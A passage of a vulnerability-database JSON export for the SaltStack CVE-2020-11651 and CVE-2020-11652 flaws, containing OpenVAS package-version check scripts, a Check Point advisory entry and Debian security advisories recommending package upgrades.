+= res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-cloud\", rpm:\"salt-cloud~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-doc\", rpm:\"salt-doc~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-master\", rpm:\"salt-master~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-minion\", rpm:\"salt-minion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-proxy\", rpm:\"salt-proxy~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-ssh\", rpm:\"salt-ssh~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-standalone-formulas-configuration\", rpm:\"salt-standalone-formulas-configuration~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-syndic\", rpm:\"salt-syndic~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-bash-completion\", rpm:\"salt-bash-completion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-fish-completion\", rpm:\"salt-fish-completion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-zsh-completion\", rpm:\"salt-zsh-completion~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-03T15:55:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-05-31T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for salt (DLA-2223-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-31T00:00:00", "id": "OPENVAS:1361412562310892223", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892223", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892223\");\n script_version(\"2020-05-31T03:00:08+0000\");\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-31 03:00:08 +0000 (Sun, 31 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-31 03:00:08 +0000 (Sun, 31 May 2020)\");\n script_name(\"Debian LTS: Security Advisory for salt (DLA-2223-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2020/05/msg00027.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2223-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/959684\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'salt'\n package(s) announced via the DLA-2223-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities were discovered in package salt, a\nconfiguration management and infrastructure automation software.\n\nCVE-2020-11651\n\nThe salt-master process ClearFuncs class does not properly validate\nmethod calls. This allows a remote user to access some methods\nwithout authentication. These methods can be used to retrieve user\ntokens from the salt master and/or run arbitrary commands on salt\nminions.\n\nCVE-2020-11652\n\nThe salt-master process ClearFuncs class allows access to some\nmethods that improperly sanitize paths. These methods allow\narbitrary directory access to authenticated users.\");\n\n script_tag(name:\"affected\", value:\"'salt' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n2014.1.13+ds-3+deb8u1.\n\nWe recommend that you upgrade your salt packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"salt-cloud\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-common\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-doc\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-master\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-minion\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-ssh\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-syndic\", ver:\"2014.1.13+ds-3+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T17:13:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-05-07T00:00:00", "type": "openvas", "title": "Debian: Security Advisory for salt (DSA-4676-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651", "CVE-2019-17361"], "modified": "2020-05-07T00:00:00", "id": "OPENVAS:1361412562310704676", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704676", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704676\");\n script_version(\"2020-05-07T03:00:32+0000\");\n script_cve_id(\"CVE-2019-17361\", \"CVE-2020-11651\", \"CVE-2020-11652\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-07 03:00:32 +0000 (Thu, 07 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-07 03:00:32 +0000 (Thu, 07 May 2020)\");\n script_name(\"Debian: Security Advisory for salt (DSA-4676-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|10)\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2020/dsa-4676.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4676-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'salt'\n package(s) announced via the DSA-4676-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\");\n\n script_tag(name:\"affected\", value:\"'salt' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u3.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2018.3.4+dfsg1-6+deb10u1.\n\nWe recommend that you upgrade your salt packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"salt-api\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-cloud\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-common\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-doc\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-master\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-minion\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-proxy\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-ssh\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-syndic\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-api\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-cloud\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-common\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-doc\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-master\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-minion\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-proxy\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-ssh\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-syndic\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:40:33", "description": "An authentication bypass vulnerability exists in Salt management framework. Successful exploitation of this vulnerability could allow a remote attacker to bypass login authentication and execute arbitrary commands on the affected system under the context of root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-05T00:00:00", "type": "checkpoint_advisories", "title": "Saltstack Salt Authentication Bypass (CVE-2020-11651; CVE-2020-11652)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-05T00:00:00", "id": "CPAI-2020-0334", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-12-17T15:02:08", "description": "Package : salt\nVersion : 2014.1.13+ds-3+deb8u1\nCVE ID : CVE-2020-11651 CVE-2020-11652\nDebian Bug : 959684\n\n\nSeveral vulnerabilities were discovered in package salt, a\nconfiguration management and infrastructure automation software.\n\nCVE-2020-11651\n\n The salt-master process ClearFuncs class does not properly validate\n method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user\n tokens from the salt master and/or run arbitrary commands on salt\n minions.\n\nCVE-2020-11652\n\n The salt-master process ClearFuncs class allows access to some\n methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n2014.1.13+ds-3+deb8u1.\n\nWe recommend that you upgrade your salt packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-30T04:21:15", "type": "debian", "title": "[SECURITY] [DLA 2223-1] salt security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-30T04:21:15", "id": "DEBIAN:DLA-2223-1:998E3", "href": "https://lists.debian.org/debian-lts-announce/2020/05/msg00027.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T12:19:54", "description": "Package : salt\nVersion : 2014.1.13+ds-3+deb8u1\nCVE ID : CVE-2020-11651 CVE-2020-11652\nDebian Bug : 959684\n\n\nSeveral vulnerabilities were discovered in package salt, a\nconfiguration management and infrastructure automation software.\n\nCVE-2020-11651\n\n The salt-master process ClearFuncs class does not properly validate\n method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user\n tokens from the salt master and/or run arbitrary commands on salt\n minions.\n\nCVE-2020-11652\n\n The salt-master process ClearFuncs class allows access to some\n methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n2014.1.13+ds-3+deb8u1.\n\nWe recommend that you upgrade your salt packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-30T04:21:15", "type": "debian", "title": "[SECURITY] [DLA 2223-1] salt security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-30T04:21:15", "id": "DEBIAN:DLA-2223-1:6A3F6", "href": "https://lists.debian.org/debian-lts-announce/2020/05/msg00027.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-29T22:26:54", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4676-2 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 07, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : salt\nCVE ID : CVE-2020-11651 CVE-2020-11652\nDebian Bug : 959684\n\nThe update for salt for the oldstable distribution (stretch) released as\nDSA 4676-1 contained an incomplete fix to address CVE-2020-11651 and\nCVE-2020-11652. Updated salt packages are now available to correct this\nissue. For reference, the original advisory text follows.\n\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u4.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/salt\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-07T20:16:07", "type": "debian", "title": "[SECURITY] [DSA 4676-2] salt security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-07T20:16:07", "id": "DEBIAN:DSA-4676-2:0B1C8", "href": "https://lists.debian.org/debian-security-announce/2020/msg00085.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T02:31:07", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4676-2 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 07, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : salt\nCVE ID : CVE-2020-11651 CVE-2020-11652\nDebian Bug : 959684\n\nThe update for salt for the oldstable distribution (stretch) released as\nDSA 4676-1 contained an incomplete fix to address CVE-2020-11651 and\nCVE-2020-11652. Updated salt packages are now available to correct this\nissue. For reference, the original advisory text follows.\n\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u4.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/salt\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-07T20:16:07", "type": "debian", "title": "[SECURITY] [DSA 4676-2] salt security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-07T20:16:07", "id": "DEBIAN:DSA-4676-2:0B49A", "href": "https://lists.debian.org/debian-security-announce/2020/msg00085.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T02:31:59", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4676-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 06, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : salt\nCVE ID : CVE-2019-17361 CVE-2020-11651 CVE-2020-11652\nDebian Bug : 949222 959684\n\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u3.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2018.3.4+dfsg1-6+deb10u1.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/salt\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-06T04:15:33", "type": "debian", "title": "[SECURITY] [DSA 4676-1] salt security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17361", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-06T04:15:33", "id": "DEBIAN:DSA-4676-1:2D12F", "href": "https://lists.debian.org/debian-security-announce/2020/msg00079.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-22T15:12:23", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4676-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 06, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : salt\nCVE ID : CVE-2019-17361 CVE-2020-11651 CVE-2020-11652\nDebian Bug : 949222 959684\n\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u3.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2018.3.4+dfsg1-6+deb10u1.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/salt\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-06T04:15:33", "type": "debian", "title": "[SECURITY] [DSA 4676-1] salt security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 